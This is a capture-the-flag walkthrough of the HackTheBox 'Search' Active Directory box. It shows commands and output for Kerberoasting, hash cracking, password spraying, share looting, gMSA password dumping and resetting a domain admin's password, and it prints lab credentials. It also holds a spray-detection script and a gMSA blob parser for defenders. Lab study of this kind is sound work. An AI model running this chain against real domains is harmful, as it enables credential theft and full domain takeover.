┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ impacket-GetUserSPNs -request -usersfile dom_userlist.txt -dc-ip research.search.htb 'search.htb/hope.sharp:IsolationIsKey?'
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] Principal: Administrator - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Guest - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$krbtgt$SEARCH.HTB$*krbtgt*$0820014f34b455d3c07b50dd$...
[-] Principal: Santino.Benjamin - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
...
[-] Principal: Jordan.Gregory - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$23$*web_svc$SEARCH.HTB$web_svc*$04c3e36f83a5b31eb7372497c08833db$...
[-] Principal: Tristan.Davies - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: - Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Now that we have the service ticket for web_svc, let's try to crack it:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ echo '$krb5tgs$23$*web_svc$SEARCH.HTB$web_svc*$04c3e36f83a5b31eb7372497c08833db$7cc4bec06406f0d77106c29ad0801fc3d3b4109e49bd6df91628324f50f58a3f957bd9606144bce79981b7d56693e547fa5eabdd53dcc1cac8695412ddb6ddf4b6b6448fe8ae274701768ff640d287002ed28efd18e3343ecabb2670e1856ea481ea45f7a399d334fdd1304d6b15b8c9337cd606500f61ce539d142697613920bced58d974fd9afbea0d3e2c6f8ea808559d3a2957dceadb619d21e3be3677d6b4acfb989561cc2420a99eb7f3ec12b318cd260cc8e5dcfb04266e03a6860c0d625d06b4a76d9a30c768a36fe92079930509d371b5d3867508b6689aaacc6e5bf4036d9de8170752207606352c8d57eb646a25d2d4a8abd0ae4c3597cb008256de9aac3269fb3ca1aa2e416661ee3bea1b019b804710d8c1f9b266679ca914abadcf9d71f66e42e8debdca33b26cbb4c865b2f57543e5b55f5406469ba0830e6890fa7c228448003812f4adb00de86b5c9b2d708323cc2f55609cab06a0b0bbad4079f931a210bebb6adf67899dc3ca773b36840e9fc25a14ab7ec21061f5701f005704661fbf3f588bbfc2a2b12b293a72aa3ffb1680048f6c77b494bf6b0e3a212d341964fcc8cc5d99081a3b5bf0f2f687b967fa87a20ad8fd9a7c9e910612c316a3d0a8494f230cfdef0ab26e6d3809bcb4f65ea601d6200b8f62a2018b422bcafe1a6324ec2102a3852d1a7778695081664c91a632a50b0f159e5b77b5be26832b6724a8f7b1334c87e217767d1963fe565b658b965cf97caf492f530b5ec3789ad31985d3446c5739e3d515d197bdf1a6e238facec5054a262e8706a9fe840a797ecfc10ae7e4a90cd4604dbe24ae13890ef6e8e84d62ca319ad546d73e7ec22c99a50c6210582c7d712783a541e47bc3b83203ce2c2a15419f187700e2f9e258a306749bd51c8be6dc72722a477687d8176e2ff205bbc467cdaa55c2d2d0c51ffde190e302e4ca58acd42f907b8bc8efd01332ddbd91910e34fd3ceac6bad7eb5cfc517b70e0428a25cedbce8155e511b365d3d21634ef10352fecb2b5aa22f0ddf0ad4ee4841d104b7f01a27d0e7e3c3816cb0255ee6833a37352d2e6961e24c6fd120fc8b082aff3ffc25cac65449527b153abc1500666d236d49c3a0238239a1282ac6750a6519fad5d909566692f21fd819a81674e6bf85253200f3a88a8faf2eb3c766058b3c25b8d3aa300a91b138401f315b2b5e79094fadc78871eacc8182e6a3e26a3bcb5273bbcca0a0cd88b88ff7355e656e76ba6d5cf7bb62661b77296ff203712c7d46622e6a0dc6d9a38c390a82a7efe27380ff75ac0936fbae297c7fd9830312a92adeebbf95341fbe53fce4ce55a27fb0e957
95e6d5fa3fac26a34de0cb63eec71c07f56cd3efef4e239649a67359f37713d9ed94199e8df3026bfb9418af9927d92b7ce84cda6bffd7960afcffbc96fcd62e2e3fce79c1a76710433ae71ef70b90a9a6baa5d469b2f8' > web_svc-krb
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ john --wordlist=/opt/seclists/Passwords/Leaked-Databases/rockyou.txt web_svc-krb
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
@3ONEmillionbaby (?)
1g 0:00:00:11 DONE (2022-04-22 14:52) 0.08960g/s 1029Kp/s 1029Kc/s 1029KC/s @4208891ncv..@#alexandra$&
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Once we cracked this ticket, the web_svc account gave us no further success, as it has the "same level of access" as hope.sharp. Let's use the password for spraying and see if another account shares it:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ crackmapexec smb search.htb -d SEARCH -u dom_userlist.txt -p '@3ONEmillionbaby' --continue-on-success
SMB search.htb 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:SEARCH) (signing:True) (SMBv1:False)
SMB search.htb 445 RESEARCH [-] SEARCH\Administrator:@3ONEmillionbaby STATUS_LOGON_FAILURE
...
SMB search.htb 445 RESEARCH [-] SEARCH\Marshall.Skinner:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB search.htb 445 RESEARCH [+] SEARCH\Edgar.Jacobs:@3ONEmillionbaby
SMB search.htb 445 RESEARCH [-] SEARCH\Elisha.Watts:@3ONEmillionbaby STATUS_LOGON_FAILURE
...
SMB search.htb 445 RESEARCH [-] SEARCH\:@3ONEmillionbaby STATUS_LOGON_FAILURE
We found another user with the same password as web_svc: Edgar.Jacobs:@3ONEmillionbaby
Let's see what we can access with this account:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbmap -H search.htb -u 'edgar.jacobs' -p '@3ONEmillionbaby' -d SEARCH
[+] IP: search.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll READ ONLY Active Directory Certificate Services share
helpdesk READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
RedirectedFolders$ READ, WRITE
SYSVOL READ ONLY Logon server share
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbclient //search.htb/RedirectedFolders$ -U 'SEARCH\edgar.jacobs'%'@3ONEmillionbaby'
Try "help" to get a list of possible commands.
smb: \> cd edgar.jacobs\
smb: \edgar.jacobs\> ls
. Dc 0 Thu Apr 9 16:04:11 2020
.. Dc 0 Thu Apr 9 16:04:11 2020
Desktop DRc 0 Mon Aug 10 06:02:16 2020
Documents DRc 0 Mon Aug 10 06:02:17 2020
Downloads DRc 0 Mon Aug 10 06:02:17 2020
3246079 blocks of size 4096. 374459 blocks available
smb: \edgar.jacobs\> ls Desktop\
. DRc 0 Mon Aug 10 06:02:16 2020
.. DRc 0 Mon Aug 10 06:02:16 2020
$RECYCLE.BIN DHSc 0 Thu Apr 9 16:05:29 2020
desktop.ini AHSc 282 Mon Aug 10 06:02:16 2020
Microsoft Edge.lnk Ac 1450 Thu Apr 9 16:05:03 2020
Phishing_Attempt.xlsx Ac 23130 Mon Aug 10 06:35:44 2020
3246079 blocks of size 4096. 374459 blocks available
smb: \edgar.jacobs\> cd ..
smb: \> get edgar.jacobs\Desktop\Phishing_Attempt.xlsx
getting file \edgar.jacobs\Desktop\Phishing_Attempt.xlsx of size 23130 as edgar.jacobs\Desktop\Phishing_Attempt.xlsx (124.8 KiloBytes/sec) (average 124.8 KiloBytes/sec)
smb: \> quit
As you can see, there is a phishing-related spreadsheet we need to inspect; nothing fancy here, I simply opened it in Google Sheets:
The spreadsheet gives us what looks like a usable set of usernames and passwords, so we compose a new user list (phishUser) and password list (phishPass) and spray once more:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ crackmapexec smb search.htb -d SEARCH -u phishUser -p phishPass --continue-on-success
SMB search.htb 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:SEARCH) (signing:True) (SMBv1:False)
SMB search.htb 445 RESEARCH [-] SEARCH\Payton.Harmon:;;36!cried!INDIA!year!50;; STATUS_LOGON_FAILURE
...
SMB search.htb 445 RESEARCH [-] SEARCH\Sierra.Frye:~~27%when%VILLAGE%full%00~~ STATUS_LOGON_FAILURE
SMB search.htb 445 RESEARCH [+] SEARCH\Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18
SMB search.htb 445 RESEARCH [-] SEARCH\Sierra.Frye:==95~pass~QUIET~austria~77== STATUS_LOGON_FAILURE
...
SMB search.htb 445 RESEARCH [-] SEARCH\Vincent.Sutton:**24&moment&BRAZIL&members&66** STATUS_LOGON_FAILURE
And we just found the following: SEARCH\Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18
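Seen from the domain controller, both sprays above produce the same pattern: one source failing once against many different accounts in a few seconds, with the odd success in between. The following detector is an added example for the defender's side, not part of the original writeup; the event lines are constructed (the source addresses are made up, the account names are the ones from the box) and simplified to timestamp, event ID, source and target.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of DC logon events (event ID, source, target account); not
# captured from the box. 10.10.14.5 sprays one password across many accounts
# and one of them accepts it; 10.10.14.9 is a user mistyping their own password.
SAMPLE_EVENTS = r"""
2022-04-22T14:55:01 4625 10.10.14.5 SEARCH\Administrator
2022-04-22T14:55:01 4625 10.10.14.5 SEARCH\Marshall.Skinner
2022-04-22T14:55:02 4624 10.10.14.5 SEARCH\Edgar.Jacobs
2022-04-22T14:55:02 4625 10.10.14.5 SEARCH\Elisha.Watts
2022-04-22T14:55:03 4625 10.10.14.5 SEARCH\Payton.Harmon
2022-04-22T14:55:03 4625 10.10.14.5 SEARCH\Sierra.Frye
2022-04-22T14:55:04 4625 10.10.14.5 SEARCH\Vincent.Sutton
2022-04-22T14:57:30 4625 10.10.14.9 SEARCH\Hope.Sharp
2022-04-22T14:58:40 4625 10.10.14.9 SEARCH\Hope.Sharp
"""

def parse_events(text):
    """Parse 'timestamp event_id source target' lines into time-sorted tuples."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, eid, src, user = line.split()
            events.append((datetime.fromisoformat(ts), int(eid), src, user))
    return sorted(events)

def detect_spray(events, window=timedelta(minutes=5), min_users=5):
    """Flag a source that fails logons for >= min_users distinct accounts within
    one window (many users, few attempts each, as opposed to brute force on one
    user), and list the accounts that nevertheless logged on from it: those are
    the ones that shared the sprayed password and need a reset."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev[2]].append(ev)
    findings = {}
    for src, evs in by_src.items():
        fails = [e for e in evs if e[1] == 4625]
        spraying = any(
            len({e[3] for e in fails[i:] if e[0] - f[0] <= window}) >= min_users
            for i, f in enumerate(fails))
        if spraying:
            findings[src] = {
                "failed_users": sorted({e[3] for e in fails}),
                "succeeded": sorted({e[3] for e in evs if e[1] == 4624}),
            }
    return findings
```

Run on the sample, it reports 10.10.14.5 with six distinct failed accounts and Edgar.Jacobs as the one that succeeded, and stays quiet about 10.10.14.9.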
Let's try this account, first checking its share access with smbmap:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbmap -H search.htb -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d SEARCH
[+] IP: search.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll READ ONLY Active Directory Certificate Services share
helpdesk NO ACCESS
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
RedirectedFolders$ READ, WRITE
SYSVOL READ ONLY Logon server share
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbclient //search.htb/RedirectedFolders$ -U 'SEARCH\Sierra.Frye'%'$$49=wide=STRAIGHT=jordan=28$$18'
Try "help" to get a list of possible commands.
smb: \> ls
. Dc 0 Fri Apr 22 17:00:50 2022
.. Dc 0 Fri Apr 22 17:00:50 2022
abril.suarez Dc 0 Tue Apr 7 14:12:58 2020
Angie.Duffy Dc 0 Fri Jul 31 09:11:32 2020
Antony.Russo Dc 0 Fri Jul 31 08:35:32 2020
belen.compton Dc 0 Tue Apr 7 14:32:31 2020
Cameron.Melendez Dc 0 Fri Jul 31 08:37:36 2020
chanel.bell Dc 0 Tue Apr 7 14:15:09 2020
Claudia.Pugh Dc 0 Fri Jul 31 09:09:08 2020
Cortez.Hickman Dc 0 Fri Jul 31 08:02:04 2020
dax.santiago Dc 0 Tue Apr 7 14:20:08 2020
Eddie.Stevens Dc 0 Fri Jul 31 07:55:34 2020
edgar.jacobs Dc 0 Thu Apr 9 16:04:11 2020
Edith.Walls Dc 0 Fri Jul 31 08:39:50 2020
eve.galvan Dc 0 Tue Apr 7 14:23:13 2020
frederick.cuevas Dc 0 Tue Apr 7 14:29:22 2020
hope.sharp Dc 0 Thu Apr 9 10:34:41 2020
jayla.roberts Dc 0 Tue Apr 7 14:07:00 2020
Jordan.Gregory Dc 0 Fri Jul 31 09:01:06 2020
payton.harmon Dc 0 Thu Apr 9 16:11:39 2020
Reginald.Morton Dc 0 Fri Jul 31 07:44:32 2020
santino.benjamin Dc 0 Tue Apr 7 14:10:25 2020
Savanah.Velazquez Dc 0 Fri Jul 31 08:21:42 2020
sierra.frye Dc 0 Wed Nov 17 20:01:46 2021
trace.ryan Dc 0 Thu Apr 9 16:14:26 2020
3246079 blocks of size 4096. 374322 blocks available
smb: \> recurse
smb: \> ls sierra.frye\
. Dc 0 Wed Nov 17 20:01:46 2021
.. Dc 0 Wed Nov 17 20:01:46 2021
Desktop DRc 0 Wed Nov 17 20:08:00 2021
Documents DRc 0 Fri Jul 31 10:42:19 2020
Downloads DRc 0 Fri Jul 31 10:45:36 2020
user.txt Ac 33 Wed Nov 17 19:55:27 2021
\sierra.frye\Desktop
. DRc 0 Wed Nov 17 20:08:00 2021
.. DRc 0 Wed Nov 17 20:08:00 2021
$RECYCLE.BIN DHSc 0 Tue Apr 7 14:03:59 2020
desktop.ini AHSc 282 Fri Jul 31 10:42:15 2020
Microsoft Edge.lnk Ac 1450 Tue Apr 7 08:28:05 2020
user.txt ARc 34 Fri Apr 22 09:32:25 2022
\sierra.frye\Documents
. DRc 0 Fri Jul 31 10:42:19 2020
.. DRc 0 Fri Jul 31 10:42:19 2020
$RECYCLE.BIN DHSc 0 Tue Apr 7 14:04:01 2020
desktop.ini AHSc 402 Fri Jul 31 10:42:19 2020
\sierra.frye\Downloads
. DRc 0 Fri Jul 31 10:45:36 2020
.. DRc 0 Fri Jul 31 10:45:36 2020
$RECYCLE.BIN DHSc 0 Tue Apr 7 14:04:01 2020
Backups DHc 0 Mon Aug 10 16:39:17 2020
desktop.ini AHSc 282 Fri Jul 31 10:42:18 2020
\sierra.frye\Desktop\$RECYCLE.BIN
. DHSc 0 Tue Apr 7 14:03:59 2020
.. DHSc 0 Tue Apr 7 14:03:59 2020
desktop.ini AHSc 129 Tue Apr 7 14:04:00 2020
\sierra.frye\Documents\$RECYCLE.BIN
. DHSc 0 Tue Apr 7 14:04:01 2020
.. DHSc 0 Tue Apr 7 14:04:01 2020
desktop.ini AHSc 129 Tue Apr 7 14:04:01 2020
\sierra.frye\Downloads\$RECYCLE.BIN
. DHSc 0 Tue Apr 7 14:04:01 2020
.. DHSc 0 Tue Apr 7 14:04:01 2020
desktop.ini AHSc 129 Tue Apr 7 14:04:01 2020
\sierra.frye\Downloads\Backups
. DHc 0 Mon Aug 10 16:39:17 2020
.. DHc 0 Mon Aug 10 16:39:17 2020
search-RESEARCH-CA.p12 Ac 2643 Fri Jul 31 11:04:11 2020
staff.pfx Ac 4326 Mon Aug 10 16:39:17 2020
3246079 blocks of size 4096. 374322 blocks available
smb: \> cd sierra.frye\Desktop\
smb: \sierra.frye\Desktop\> get user.txt
getting file \sierra.frye\Desktop\user.txt of size 34 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \sierra.frye\Desktop\> cd ..\Downloads\Backups\
smb: \sierra.frye\Downloads\Backups\> get search-RESEARCH-CA.p12
getting file \sierra.frye\Downloads\Backups\search-RESEARCH-CA.p12 of size 2643 as search-RESEARCH-CA.p12 (15.0 KiloBytes/sec) (average 7.5 KiloBytes/sec)
smb: \sierra.frye\Downloads\Backups\> get staff.pfx
getting file \sierra.frye\Downloads\Backups\staff.pfx of size 4326 as staff.pfx (25.0 KiloBytes/sec) (average 13.2 KiloBytes/sec)
smb: \sierra.frye\Downloads\Backups\> quit
At this point, not only did we find the user flag without a shell, but we also found two PKCS#12 certificate files (a .p12 and a .pfx).
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ cat user.txt
ab0459********************bea8e6
When we try to view the contents of the certificate file, we cannot: it was exported with a passphrase that protects the private key.
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ openssl pkcs12 -info -in staff.pfx
Enter Import Password:
Can't read Password
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ pfx2john staff.pfx > staff_pfx
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ john --wordlist=/opt/seclists/Passwords/Leaked-Databases/rockyou.txt staff_pfx
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
misspissy (staff.pfx)
1g 0:00:03:39 DONE (2022-04-22 17:16) 0.004549g/s 24952p/s 24952c/s 24952C/s misssnail..missnona16
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ pfx2john search-RESEARCH-CA.p12 > search_p12
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ john --wordlist=/opt/seclists/Passwords/Leaked-Databases/rockyou.txt search_p12
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
misspissy (search-RESEARCH-CA.p12)
1g 0:00:03:41 DONE (2022-04-22 17:24) 0.004518g/s 24782p/s 24782c/s 24782C/s misssnail..missnona16
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
To use these certificate files, you will have to import them into the browser.
This gives us a PowerShell session in the browser. Here we will check and change the execution policy and load PowerView into memory for later use:
While enumerating directories, we bump into a home directory for what seems to be a group managed service account (gMSA):
PS C:\users> ls
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/23/2020 7:20 AM .NET v4.5
d----- 3/23/2020 7:20 AM .NET v4.5 Classic
d----- 12/20/2021 8:34 AM Administrator
d----- 7/31/2020 10:01 AM BIR-ADFS-GMSA$
d-r--- 3/23/2020 7:07 AM Public
d----- 4/23/2022 4:23 AM Sierra.Frye
d----- 8/11/2020 8:45 AM WSEnrollmentServer
PS C:\users>
With this account, we should enumerate the domain a little more using BloodHound:
Using the 'Shortest Path to Domain Admins' query, we can see that Sierra.Frye, through rights inherited from the ITSEC group, can read the gMSA password of BIR-ADFS-GMSA. That service account has GenericAll rights over Tristan.Davies, a domain admin, which means the account can be modified.
When we dump the gMSA password as Sierra.Frye, we get the following NT hash:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ python3 /opt/gMSADumper/gMSADumper.py -l search.htb -d search.htb -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18'
Users or groups who can read password for BIR-ADFS-GMSA$:
> ITSec
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f
Back in PowerShell, we will read the msDS-ManagedPassword attribute, convert the blob into a credential, and use it to change Tristan.Davies's password:
PS C:\users> Get-ADServiceAccount -Identity BIR-ADFS-GMSA$ -Properties 'msDS-ManagedPassword'
DistinguishedName : CN=BIR-ADFS-GMSA,CN=Managed Service Accounts,DC=search,DC=htb
Enabled : True
msDS-ManagedPassword : {1, 0, 0, 0...}
Name : BIR-ADFS-GMSA
ObjectClass : msDS-GroupManagedServiceAccount
ObjectGUID : 48cd6c5b-56cb-407e-ac2b-7294b5a44857
SamAccountName : BIR-ADFS-GMSA$
SID : S-1-5-21-271492789-1610487937-1871574529-1299
UserPrincipalName :
PS C:\users> $gMSA = Get-ADServiceAccount -Identity BIR-ADFS-GMSA$ -Properties 'msDS-ManagedPassword'
PS C:\users> $data = $gMSA.'msDS-ManagedPassword'
PS C:\users> $pass = ConvertFrom-ADManagedPasswordBlob $data
PS C:\users> $user = 'BIR-ADFS-GMSA$'
PS C:\users> $creds = New-Object System.Management.Automation.PSCredential $user,$pass.SecureCurrentPassword
PS C:\users> Invoke-Command -ComputerName localhost -Credential $creds -ScriptBlock {net user Tristan.Davies test /domain}
The password does not meet the password policy requirements. Check the minimum password length, password complexity
and password history requirements.
+ CategoryInfo : NotSpecified: (The password do...y requirements.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
+ PSComputerName : localhost
NotSpecified: (:String) [], RemoteException
More help is available by typing NET HELPMSG 2245.
NotSpecified: (:String) [], RemoteException
PS C:\users> Invoke-Command -ComputerName localhost -Credential $creds -ScriptBlock {net user Tristan.Davies test1234 /domain}
The command completed successfully.
PS C:\users>
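The `{1, 0, 0, 0...}` that Get-ADServiceAccount prints above is the start of an MSDS-MANAGEDPASSWORD_BLOB (version 1, then a reserved word); ConvertFrom-ADManagedPasswordBlob decodes that structure into the credential used here, and gMSADumper reads the same attribute over LDAP and prints the MD4 (NT hash) of the current password. The parser below is an added explainer, not code from the writeup or from either tool; the blob it builds is constructed with a short made-up password, whereas a real gMSA password is long and random and rotates automatically (30 days by default), which is the window in which a dumped hash stays usable.

```python
import struct

# MSDS-MANAGEDPASSWORD_BLOB (MS-ADTS 2.2.19): Version, Reserved, Length, then
# four 16-bit offsets (from the start of the blob) to CurrentPassword,
# PreviousPassword (0 when absent), QueryPasswordInterval and
# UnchangedPasswordInterval. All little-endian; passwords are UTF-16-LE with a
# terminating null; intervals are 64-bit counts of 100-nanosecond ticks.
HEADER = "<HHIHHHH"
TICKS_PER_DAY = 24 * 3600 * 10**7

def build_blob(current, previous="", query_days=30, unchanged_days=30):
    """Lay out a blob as AD does (constructed test data, not read from a DC)."""
    cur = current.encode("utf-16-le") + b"\x00\x00"
    prev = previous.encode("utf-16-le") + b"\x00\x00" if previous else b""
    cur_off = struct.calcsize(HEADER)            # 16-byte fixed header
    prev_off = cur_off + len(cur) if previous else 0
    q_off = cur_off + len(cur) + len(prev)
    u_off = q_off + 8
    header = struct.pack(HEADER, 1, 0, u_off + 8, cur_off, prev_off, q_off, u_off)
    intervals = struct.pack("<QQ", query_days * TICKS_PER_DAY, unchanged_days * TICKS_PER_DAY)
    return header + cur + prev + intervals

def parse_blob(blob):
    """Decode a blob into its cleartext passwords and rotation intervals (days)."""
    version, _, length, cur_off, prev_off, q_off, u_off = struct.unpack_from(HEADER, blob)
    if version != 1 or length != len(blob):
        raise ValueError("not a version-1 MSDS-MANAGEDPASSWORD_BLOB")
    def wstr(start, end):   # UTF-16-LE slice, minus the null terminator
        return blob[start:end].decode("utf-16-le").rstrip("\x00")
    current = wstr(cur_off, prev_off or q_off)
    previous = wstr(prev_off, q_off) if prev_off else None
    (q_ticks,) = struct.unpack_from("<Q", blob, q_off)
    (u_ticks,) = struct.unpack_from("<Q", blob, u_off)
    return {
        "current": current,                       # what SecureCurrentPassword holds
        "previous": previous,                     # still valid during rollover
        "query_interval_days": q_ticks / TICKS_PER_DAY,     # when to re-query
        "unchanged_interval_days": u_ticks / TICKS_PER_DAY, # guaranteed stable
    }
```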
Having changed the password on Tristan.Davies, we can now access the account with no issues.
Accessing the system through SMB:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbclient //search.htb/C$ -U 'SEARCH/Tristan.Davies%test1234'
Try "help" to get a list of possible commands.
smb: \> pwd
Current directory is \\search.htb\C$\
smb: \> cd Users\Administrator\
smb: \Users\Administrator\> ls
. Dc 0 Mon Dec 20 03:34:49 2021
.. Dc 0 Mon Dec 20 03:34:49 2021
3D Objects DRc 0 Mon Nov 22 15:21:49 2021
AppData DHc 0 Mon Mar 23 03:07:10 2020
Application Data DHSrn 0 Mon Mar 23 03:07:10 2020
Contacts DRc 0 Mon Nov 22 15:21:49 2021
Cookies DHSrn 0 Mon Mar 23 03:07:10 2020
Desktop DRc 0 Mon Nov 22 15:21:49 2021
Documents DRc 0 Mon Nov 22 15:21:50 2021
Downloads DRc 0 Mon Nov 22 15:21:49 2021
Favorites DRc 0 Mon Nov 22 15:21:49 2021
Links DRc 0 Mon Nov 22 15:21:50 2021
Local Settings DHSrn 0 Mon Mar 23 03:07:10 2020
Music DRc 0 Mon Nov 22 15:21:49 2021
My Documents DHSrn 0 Mon Mar 23 03:07:10 2020
NetHood DHSrn 0 Mon Mar 23 03:07:10 2020
NTUSER.DAT AHn 262144 Sat Apr 23 00:56:33 2022
ntuser.dat.LOG1 AHS 8192 Mon Mar 23 03:07:10 2020
ntuser.dat.LOG2 AHS 40960 Mon Mar 23 03:07:10 2020
NTUSER.DAT{5c711dff-6c97-11ea-81f6-0050568a65c6}.TM.blf AHS 65536 Mon Mar 23 03:07:11 2020
NTUSER.DAT{5c711dff-6c97-11ea-81f6-0050568a65c6}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Mon Mar 23 03:07:10 2020
NTUSER.DAT{5c711dff-6c97-11ea-81f6-0050568a65c6}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Mon Mar 23 03:07:10 2020
ntuser.ini HSc 20 Mon Mar 23 03:07:10 2020
ntuser.pol AHSRc 480 Thu Jul 30 09:21:24 2020
Pictures DRc 0 Mon Nov 22 15:21:49 2021
Recent DHSrn 0 Mon Mar 23 03:07:10 2020
Saved Games DRc 0 Mon Nov 22 15:21:50 2021
Searches DRc 0 Mon Nov 22 15:21:49 2021
SendTo DHSrn 0 Mon Mar 23 03:07:10 2020
Start Menu DHSrn 0 Mon Mar 23 03:07:10 2020
Templates DHSrn 0 Mon Mar 23 03:07:10 2020
Videos DRc 0 Mon Nov 22 15:21:49 2021
3246079 blocks of size 4096. 409296 blocks available
smb: \Users\Administrator\> ls Desktop\
. DRc 0 Mon Nov 22 15:21:49 2021
.. DRc 0 Mon Nov 22 15:21:49 2021
desktop.ini AHS 282 Mon Nov 22 15:21:49 2021
root.txt ARc 34 Fri Apr 22 09:32:25 2022
3246079 blocks of size 4096. 411142 blocks available
smb: \Users\Administrator\> cd Desktop\
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \Users\Administrator\Desktop\> quit
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ cat root.txt
77dd4b********************8a5483
AND we got the root flag!!
Once we have this passphrase and inspect the certificates, we see that one file holds a user certificate and the other the CA certificate (both, of course, in PKCS#12 form). With these certificates, we can try to access the service the user certificate was issued for: